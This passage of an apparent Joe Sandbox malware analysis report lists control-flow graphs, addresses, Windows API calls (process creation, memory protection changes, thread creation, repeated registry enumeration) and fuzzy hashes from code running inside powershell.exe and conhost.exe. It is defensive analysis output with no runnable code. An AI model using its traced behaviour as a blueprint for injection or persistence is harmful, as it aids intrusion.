                                                                  control_flow_graph 93 7ffd9b8b0241-7ffd9b8b024d 94 7ffd9b8b0258-7ffd9b8b0712 93->94 95 7ffd9b8b024f-7ffd9b8b0257 93->95 104 7ffd9b8b0770-7ffd9b8b07a2 94->104 105 7ffd9b8b0714-7ffd9b8b0723 94->105 95->94 110 7ffd9b8b0800-7ffd9b8b0851 104->110 111 7ffd9b8b07a4-7ffd9b8b07b3 104->111 105->104 106 7ffd9b8b0725-7ffd9b8b0728 105->106 108 7ffd9b8b072a-7ffd9b8b073d 106->108 109 7ffd9b8b0762-7ffd9b8b076a 106->109 112 7ffd9b8b073f 108->112 113 7ffd9b8b0741-7ffd9b8b0754 108->113 109->104 119 7ffd9b8b08af-7ffd9b8b08e0 110->119 120 7ffd9b8b0853-7ffd9b8b0862 110->120 111->110 115 7ffd9b8b07b5-7ffd9b8b07b8 111->115 112->113 113->113 114 7ffd9b8b0756-7ffd9b8b0760 113->114 114->109 116 7ffd9b8b07ba-7ffd9b8b07cd 115->116 117 7ffd9b8b07f2-7ffd9b8b07fa 115->117 121 7ffd9b8b07cf 116->121 122 7ffd9b8b07d1-7ffd9b8b07e4 116->122 117->110 130 7ffd9b8b08ee-7ffd9b8b096e CreateProcessA 119->130 131 7ffd9b8b08e2-7ffd9b8b08ea 119->131 120->119 123 7ffd9b8b0864-7ffd9b8b0867 120->123 121->122 122->122 124 7ffd9b8b07e6-7ffd9b8b07f0 122->124 125 7ffd9b8b0869-7ffd9b8b087c 123->125 126 7ffd9b8b08a1-7ffd9b8b08a9 123->126 124->117 128 7ffd9b8b0880-7ffd9b8b0893 125->128 129 7ffd9b8b087e 125->129 126->119 128->128 132 7ffd9b8b0895-7ffd9b8b089d 128->132 129->128 133 7ffd9b8b0976-7ffd9b8b09b3 call 7ffd9b8b09cf 130->133 134 7ffd9b8b0970 130->134 131->130 132->126 137 7ffd9b8b09b5 133->137 138 7ffd9b8b09ba-7ffd9b8b09ce 133->138 134->133 137->138
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 35ad49e393d5b63220c4ee17b6d2236927d31ee0c5aeac98b04332784744950a
                                                                  • Instruction ID: 94ed6f8a5d9398cdc9354921a869490fc55ab091dc00fe238840e0d690984569
                                                                  • Opcode Fuzzy Hash: 35ad49e393d5b63220c4ee17b6d2236927d31ee0c5aeac98b04332784744950a
                                                                  • Instruction Fuzzy Hash: FED12830619B8D8FEB64DF28CC567E97BE0FF59310F05426AD84DC72A2DA34A5458BC2
                                                                  Function 00007FFD9B8AEB1A Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 139 7ffd9b8aeb1a-7ffd9b8aeb27 140 7ffd9b8aeb29-7ffd9b8aeb31 139->140 141 7ffd9b8aeb32-7ffd9b8aebff 139->141 140->141 145 7ffd9b8aec5a-7ffd9b8aecd7 CreateFileMappingW 141->145 146 7ffd9b8aec01-7ffd9b8aec10 141->146 151 7ffd9b8aecd9 145->151 152 7ffd9b8aecdf-7ffd9b8aed1b call 7ffd9b8aed37 145->152 146->145 147 7ffd9b8aec12-7ffd9b8aec15 146->147 148 7ffd9b8aec17-7ffd9b8aec2a 147->148 149 7ffd9b8aec4f-7ffd9b8aec57 147->149 153 7ffd9b8aec2c 148->153 154 7ffd9b8aec2e-7ffd9b8aec41 148->154 149->145 151->152 159 7ffd9b8aed1d 152->159 160 7ffd9b8aed22-7ffd9b8aed36 152->160 153->154 154->154 155 7ffd9b8aec43-7ffd9b8aec4b 154->155 155->149 159->160
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileMapping
                                                                  • String ID:
                                                                  • API String ID: 524692379-0
                                                                  • Opcode ID: d4ee2fe0a5e479e28961f603257062ef4beb52ada74d37f778e95dad07cbe871
                                                                  • Instruction ID: f9f2fcdef3d496de10123db7235d67d706e242cc4b2b2d0219088b24e9646677
                                                                  • Opcode Fuzzy Hash: d4ee2fe0a5e479e28961f603257062ef4beb52ada74d37f778e95dad07cbe871
                                                                  • Instruction Fuzzy Hash: B271393050CA8C4FEB59DF68C816BE43BE0FF19311F1402AEE84DC72A2DA75A8418791
                                                                  Function 00007FFD9B8AE8CC Relevance: 1.7, APIs: 1, Instructions: 234fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 161 7ffd9b8ae8cc-7ffd9b8ae8d3 162 7ffd9b8ae8d5-7ffd9b8ae8dd 161->162 163 7ffd9b8ae8de-7ffd9b8ae973 161->163 162->163 167 7ffd9b8ae975-7ffd9b8ae977 163->167 168 7ffd9b8ae9bd 163->168 171 7ffd9b8ae979-7ffd9b8ae988 167->171 172 7ffd9b8ae9d2-7ffd9b8aea03 167->172 169 7ffd9b8aea07-7ffd9b8aea1d 168->169 170 7ffd9b8ae9be-7ffd9b8ae9c3 168->170 174 7ffd9b8aea1f-7ffd9b8aea6a CreateFileA 169->174 173 7ffd9b8ae9c7-7ffd9b8ae9d1 170->173 171->172 175 7ffd9b8ae98a-7ffd9b8ae98d 171->175 172->169 173->172 173->174 178 7ffd9b8aea6c 174->178 179 7ffd9b8aea72-7ffd9b8aeaae call 7ffd9b8aeaca 174->179 175->173 176 7ffd9b8ae98f-7ffd9b8ae9a2 175->176 180 7ffd9b8ae9a6-7ffd9b8ae9b9 176->180 181 7ffd9b8ae9a4 176->181 178->179 186 7ffd9b8aeab5-7ffd9b8aeac9 179->186 187 7ffd9b8aeab0 179->187 180->180 183 7ffd9b8ae9bb-7ffd9b8ae9bc 180->183 181->180 183->168 187->186
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 24904fd8ceb9cf6b95fc60d21620d1e19620f177159fa189f9d638527f44501e
                                                                  • Instruction ID: d7ae401efc971faee5ac444b19e33c4e409d00a90f78b04c5a8acf7a0b81d46d
                                                                  • Opcode Fuzzy Hash: 24904fd8ceb9cf6b95fc60d21620d1e19620f177159fa189f9d638527f44501e
                                                                  • Instruction Fuzzy Hash: F761193051CB8D8FEB68DF58DC567E43BE0FF59311F14426AE84EC7292DA34A9418B91
                                                                  Function 00007FFD9B8AED86 Relevance: 1.6, APIs: 1, Instructions: 136fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 188 7ffd9b8aed86-7ffd9b8aed93 189 7ffd9b8aed95-7ffd9b8aed9d 188->189 190 7ffd9b8aed9e-7ffd9b8aedaf 188->190 189->190 191 7ffd9b8aedba-7ffd9b8aee71 MapViewOfFile 190->191 192 7ffd9b8aedb1-7ffd9b8aedb9 190->192 196 7ffd9b8aee79-7ffd9b8aee96 191->196 197 7ffd9b8aee73 191->197 192->191 197->196
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: FileView
                                                                  • String ID:
                                                                  • API String ID: 3314676101-0
                                                                  • Opcode ID: 4eb88c1a398054de201586deca9364ba132c3e52c12814866e4c766a682f1ad6
                                                                  • Instruction ID: 1bb214e8e011747c5c45be4c839b4d41fbd80e4d59641c1f964efbd2cb038cd1
                                                                  • Opcode Fuzzy Hash: 4eb88c1a398054de201586deca9364ba132c3e52c12814866e4c766a682f1ad6
                                                                  • Instruction Fuzzy Hash: 1D413A3090CB889FDB1DDBACD805AE87BF0FF5A321F14026ED089C31A2DB646852C791
                                                                  Function 00007FFD9B8AE7C8 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 198 7ffd9b8ae7c8-7ffd9b8ae7cf 199 7ffd9b8ae7da-7ffd9b8ae890 K32GetModuleInformation 198->199 200 7ffd9b8ae7d1-7ffd9b8ae7d9 198->200 204 7ffd9b8ae898-7ffd9b8ae8c7 199->204 205 7ffd9b8ae892 199->205 200->199 205->204
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1990167003.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b8a0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: InformationModule
                                                                  • String ID:
                                                                  • API String ID: 3425974696-0
                                                                  • Opcode ID: 352fa06a7eda95d10b9a6dc143295ca3a839630c9dce7c1196b71588aff0e78b
                                                                  • Instruction ID: 7adcfb71079ea0dfb542cf371c2e2aacfd89847a200c83703f751e976a5a8800
                                                                  • Opcode Fuzzy Hash: 352fa06a7eda95d10b9a6dc143295ca3a839630c9dce7c1196b71588aff0e78b
                                                                  • Instruction Fuzzy Hash: CF312430E0CA4C8FDB1CDBAC98456F9BBE1EF69321F00426FD049C3692DB7468468B81
                                                                  Function 00007FFD9B9714DC Relevance: 1.4, Instructions: 1375COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 253 7ffd9b9714dc-7ffd9b9714f1 254 7ffd9b9714f3-7ffd9b971533 253->254 255 7ffd9b971535-7ffd9b9715a9 253->255 254->255 260 7ffd9b9715ad-7ffd9b9715b8 255->260 261 7ffd9b9720ef-7ffd9b972107 260->261 262 7ffd9b9715be-7ffd9b9715cb 260->262 268 7ffd9b972111-7ffd9b972147 261->268 269 7ffd9b972109-7ffd9b972110 261->269 263 7ffd9b9715cd-7ffd9b9715e0 262->263 264 7ffd9b9715e7-7ffd9b971650 262->264 263->264 264->261 273 7ffd9b971656-7ffd9b971663 264->273 269->268 274 7ffd9b97167f-7ffd9b9717aa 273->274 275 7ffd9b971665-7ffd9b971678 273->275 274->261 284 7ffd9b9717b0-7ffd9b9717bd 274->284 275->274 285 7ffd9b9717bf-7ffd9b9717d2 284->285 286 7ffd9b9717d9-7ffd9b97184e 284->286 285->286 286->261 291 7ffd9b971854-7ffd9b971861 286->291 292 7ffd9b971863-7ffd9b971876 291->292 293 7ffd9b97187d-7ffd9b9718f2 291->293 292->293 293->261 298 7ffd9b9718f8-7ffd9b971905 293->298 299 7ffd9b971921-7ffd9b971996 298->299 300 7ffd9b971907-7ffd9b97191a 298->300 299->261 305 7ffd9b97199c-7ffd9b9719a9 299->305 300->299 306 7ffd9b9719ab-7ffd9b9719be 305->306 307 7ffd9b9719c5-7ffd9b971a3a 305->307 306->307 307->261 312 7ffd9b971a40-7ffd9b971a4d 307->312 313 7ffd9b971a4f-7ffd9b971a62 312->313 314 7ffd9b971a69-7ffd9b971b39 312->314 313->314 314->261 321 7ffd9b971b3f-7ffd9b971b4c 314->321 322 7ffd9b971b4e-7ffd9b971b61 321->322 323 7ffd9b971b68-7ffd9b971bda 321->323 322->323 323->261 328 7ffd9b971be0-7ffd9b971bed 323->328 329 7ffd9b971bef-7ffd9b971c02 328->329 330 7ffd9b971c09-7ffd9b971ccf 328->330 329->330 330->261 337 7ffd9b971cd5-7ffd9b971ce2 330->337 338 7ffd9b971ce4-7ffd9b971cf7 337->338 339 7ffd9b971cfe-7ffd9b971dc4 337->339 338->339 339->261 346 7ffd9b971dca-7ffd9b971dd7 339->346 347 7ffd9b971df3-7ffd9b971e5e 346->347 348 7ffd9b971dd9-7ffd9b971dec 346->348 347->261 353 7ffd9b971e64-7ffd9b971e71 347->353 348->347 354 7ffd9b971e73-7ffd9b971e86 353->354 355 7ffd9b971e8d-7ffd9b971eff 353->355 354->355 355->261 360 7ffd9b971f05-7ffd9b971f12 355->360 361 7ffd9b971f14-7ffd9b971f27 360->361 362 7ffd9b971f2e-7ffd9b971ffb 360->362 361->362 362->261 369 7ffd9b972001-7ffd9b97200e 362->369 370 7ffd9b972010-7ffd9b972023 369->370 371 7ffd9b97202a-7ffd9b9720ec 369->371 370->371 371->261
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1992022694.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e51396bc1d030c845ee0894ce3f2a19e47550e97f8909fb805544cd2149f4603
                                                                  • Instruction ID: 2d3c30f9b1113715b538cc354ef96cf0ad0a044e21d7920c0609fef60e128bd4
                                                                  • Opcode Fuzzy Hash: e51396bc1d030c845ee0894ce3f2a19e47550e97f8909fb805544cd2149f4603
                                                                  • Instruction Fuzzy Hash: 0FA24F3031CA488FDBA9EB2CD4A4E6573E1EFA9305B15459DD04ACB2A6DE31FC45CB81
                                                                  Function 00007FFD9BB27F5A Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1998396044.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h&_H
                                                                  • API String ID: 0-2788340379
                                                                  • Opcode ID: 753997a1728c19b8eca2401dfbb9a74873bb249cdeea1e274d4fe3699098bc19
                                                                  • Instruction ID: f3cf17561afe5573ee6fdb838a153a1ee5377681d2013efd1cf31dc3eb17b66c
                                                                  • Opcode Fuzzy Hash: 753997a1728c19b8eca2401dfbb9a74873bb249cdeea1e274d4fe3699098bc19
                                                                  • Instruction Fuzzy Hash: 88310533B0DA5D0FEBA4D69C24255F973C1EFA8620B0501B7D52DC31D6EE14AD1143C5
                                                                  Function 00007FFD9BB27F8D Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1998396044.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9bb20000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: h&_H
                                                                  • API String ID: 0-2788340379
                                                                  • Opcode ID: 9ce492da2cf30d56f0693e2020e26c30911d2edc997fb9b74a4002bd05a092b0
                                                                  • Instruction ID: 2f88a1ae5230e2c86f08ae8b7ccf5ada54a521f1744603e5db72a37d626ec165
                                                                  • Opcode Fuzzy Hash: 9ce492da2cf30d56f0693e2020e26c30911d2edc997fb9b74a4002bd05a092b0
                                                                  • Instruction Fuzzy Hash: 8AF05923F0E9DD0BEBA591AC34255F526C1EFA5620B4901B6D51CC72C6DC049C1503C1
                                                                  Function 00007FFD9B972160 Relevance: .3, Instructions: 304COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1992022694.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f07578d2ee1a2dbeba88a0441066a180f91c8c2748cebc38db4a5775f5ca2a2b
                                                                  • Instruction ID: c51f6fb6484e1be4127366cecb7318abcd16509e8944b9f3dc8e2278b97bac2e
                                                                  • Opcode Fuzzy Hash: f07578d2ee1a2dbeba88a0441066a180f91c8c2748cebc38db4a5775f5ca2a2b
                                                                  • Instruction Fuzzy Hash: E6914862B2FA8D1FE7A996AC58A46707BD0EF66210B0901FBD49CC71E3DD19AC05C341
                                                                  Function 00007FFD9B9722F1 Relevance: .1, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000042.00000002.1992022694.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_66_2_7ffd9b970000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5926fbb382447234e5aeafcccfab86f61687a8049385348c6995385692036b9e
                                                                  • Instruction ID: 06da7994bfb36a09c9a37e0c9aaa0894bced4f58d6e9e128b4214efbe24bc513
                                                                  • Opcode Fuzzy Hash: 5926fbb382447234e5aeafcccfab86f61687a8049385348c6995385692036b9e
                                                                  • Instruction Fuzzy Hash: 8E21D653B2FBCA1FE7A596A814A5164BBD0EF6665471941FAD4ACC71E3DC092C058301

                                                                  Execution Graph

                                                                  Execution Coverage:0.7%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:74
                                                                  Total number of Limit Nodes:1
                                                                  execution_graph 7902 14ecb4a1ac8 7909 14ecb4a1628 GetProcessHeap HeapAlloc 7902->7909 7904 14ecb4a1ad7 7905 14ecb4a1ade SleepEx 7904->7905 7908 14ecb4a1598 StrCmpIW StrCmpW 7904->7908 7960 14ecb4a18b4 7904->7960 7906 14ecb4a1628 50 API calls 7905->7906 7906->7904 7908->7904 7977 14ecb4a1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7909->7977 7911 14ecb4a1650 7978 14ecb4a1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7911->7978 7913 14ecb4a1658 7979 14ecb4a1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7913->7979 7915 14ecb4a1661 7980 14ecb4a1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7915->7980 7917 14ecb4a166a 7981 14ecb4a1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7917->7981 7919 14ecb4a1673 7982 14ecb4a1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7919->7982 7921 14ecb4a167c 7983 14ecb4a1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7921->7983 7923 14ecb4a1685 7984 14ecb4a1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7923->7984 7925 14ecb4a168e RegOpenKeyExW 7926 14ecb4a18a6 7925->7926 7927 14ecb4a16c0 RegOpenKeyExW 7925->7927 7926->7904 7928 14ecb4a16e9 7927->7928 7929 14ecb4a16ff RegOpenKeyExW 7927->7929 7985 14ecb4a12bc RegQueryInfoKeyW 7928->7985 7930 14ecb4a173a RegOpenKeyExW 7929->7930 7931 14ecb4a1723 7929->7931 7935 14ecb4a175e 7930->7935 7936 14ecb4a1775 RegOpenKeyExW 7930->7936 7994 14ecb4a104c RegQueryInfoKeyW 7931->7994 7938 14ecb4a12bc 16 API calls 7935->7938 7939 14ecb4a1799 7936->7939 7940 14ecb4a17b0 RegOpenKeyExW 7936->7940 7941 14ecb4a176b RegCloseKey 7938->7941 7942 14ecb4a12bc 16 API calls 7939->7942 7943 14ecb4a17eb RegOpenKeyExW 7940->7943 7944 14ecb4a17d4 7940->7944 7941->7936 7947 14ecb4a17a6 RegCloseKey 7942->7947 7945 14ecb4a1826 RegOpenKeyExW 7943->7945 7946 14ecb4a180f 7943->7946 7948 14ecb4a12bc 16 API calls 7944->7948 7951 14ecb4a184a 7945->7951 7952 14ecb4a1861 RegOpenKeyExW 7945->7952 7950 14ecb4a104c 6 API calls 7946->7950 7947->7940 7949 14ecb4a17e1 RegCloseKey 7948->7949 7949->7943 7953 14ecb4a181c RegCloseKey 7950->7953 7954 14ecb4a104c 6 API calls 7951->7954 7955 14ecb4a189c RegCloseKey 7952->7955 7956 14ecb4a1885 7952->7956 7953->7945 7957 14ecb4a1857 RegCloseKey 7954->7957 7955->7926 7958 14ecb4a104c 6 API calls 7956->7958 7957->7952 7959 14ecb4a1892 RegCloseKey 7958->7959 7959->7955 8004 14ecb4a14a4 7960->8004 7977->7911 7978->7913 7979->7915 7980->7917 7981->7919 7982->7921 7983->7923 7984->7925 7986 14ecb4a1327 GetProcessHeap HeapAlloc 7985->7986 7987 14ecb4a148a RegCloseKey 7985->7987 7988 14ecb4a1476 GetProcessHeap HeapFree 7986->7988 7989 14ecb4a1352 RegEnumValueW 7986->7989 7987->7929 7988->7987 7990 14ecb4a13a5 7989->7990 7990->7988 7990->7989 7992 14ecb4a141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 7990->7992 7993 14ecb4a13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7990->7993 7999 14ecb4a152c 7990->7999 7992->7990 7993->7992 7995 14ecb4a11b5 RegCloseKey 7994->7995 7997 14ecb4a10bf 7994->7997 7995->7930 7996 14ecb4a10cf RegEnumValueW 7996->7997 7997->7995 7997->7996 7998 14ecb4a114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7997->7998 7998->7997 8000 14ecb4a157c 7999->8000 8001 14ecb4a1546 7999->8001 8000->7990 8001->8000 8002 14ecb4a155d StrCmpIW 8001->8002 8003 14ecb4a1565 StrCmpW 8001->8003 8002->8001 8003->8001 8005 14ecb4a14e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 8004->8005 8006 14ecb4a14c1 GetProcessHeap HeapFree 8004->8006 8006->8005 8006->8006

                                                                  Executed Functions

                                                                  Function 0000014ECB4A3620 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32 ref: 0000014ECB4A3639
                                                                  • PathFindFileNameW.SHLWAPI ref: 0000014ECB4A3648
                                                                    • Part of subcall function 0000014ECB4A3C74: StrCmpNIW.SHLWAPI(?,?,?,0000014ECB4A254B), ref: 0000014ECB4A3C8C
                                                                    • Part of subcall function 0000014ECB4A3BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000014ECB4A365F), ref: 0000014ECB4A3BCE
                                                                    • Part of subcall function 0000014ECB4A3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000014ECB4A365F), ref: 0000014ECB4A3BFC
                                                                    • Part of subcall function 0000014ECB4A3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000014ECB4A365F), ref: 0000014ECB4A3C1E
                                                                    • Part of subcall function 0000014ECB4A3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000014ECB4A365F), ref: 0000014ECB4A3C39
                                                                    • Part of subcall function 0000014ECB4A3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000014ECB4A365F), ref: 0000014ECB4A3C5A
                                                                  • CreateThread.KERNELBASE ref: 0000014ECB4A368F
                                                                    • Part of subcall function 0000014ECB4A1D40: GetCurrentThread.KERNEL32 ref: 0000014ECB4A1D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                  • String ID:
                                                                  • API String ID: 1683269324-0
                                                                  • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction ID: 446be610b8d5eb5db247b132eab7b0ed210335f6137fe254784a06e4b0cb33bb
                                                                  • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction Fuzzy Hash: 3B118831A1C6218DFF709B24B8C53EB62E2F7A4B45F5041159706816F5FF7CC038AA00
                                                                  Function 0000014ECB472AC0 Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction ID: b718ff1bf738cf45eaa94060793e083fa5cc7f1eb7d41b8d47b72f5485542534
                                                                  • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction Fuzzy Hash: A3911372B056508BEF64CF25E084BAD73D1F756B94F5481249F4A2BBA8FE38D816D700
                                                                  Function 0000014ECB4A1AC8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 0000014ECB4A1628: GetProcessHeap.KERNEL32 ref: 0000014ECB4A1633
                                                                    • Part of subcall function 0000014ECB4A1628: HeapAlloc.KERNEL32 ref: 0000014ECB4A1642
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A16B2
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A16DF
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A16F9
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A1719
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A1734
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A1754
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A176F
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A178F
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A17AA
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A17CA
                                                                  • SleepEx.KERNELBASE ref: 0000014ECB4A1AE3
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A17E5
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A1805
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A1820
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A1840
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A185B
                                                                    • Part of subcall function 0000014ECB4A1628: RegOpenKeyExW.ADVAPI32 ref: 0000014ECB4A187B
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A1896
                                                                    • Part of subcall function 0000014ECB4A1628: RegCloseKey.ADVAPI32 ref: 0000014ECB4A18A0
                                                                  Memory Dump Source
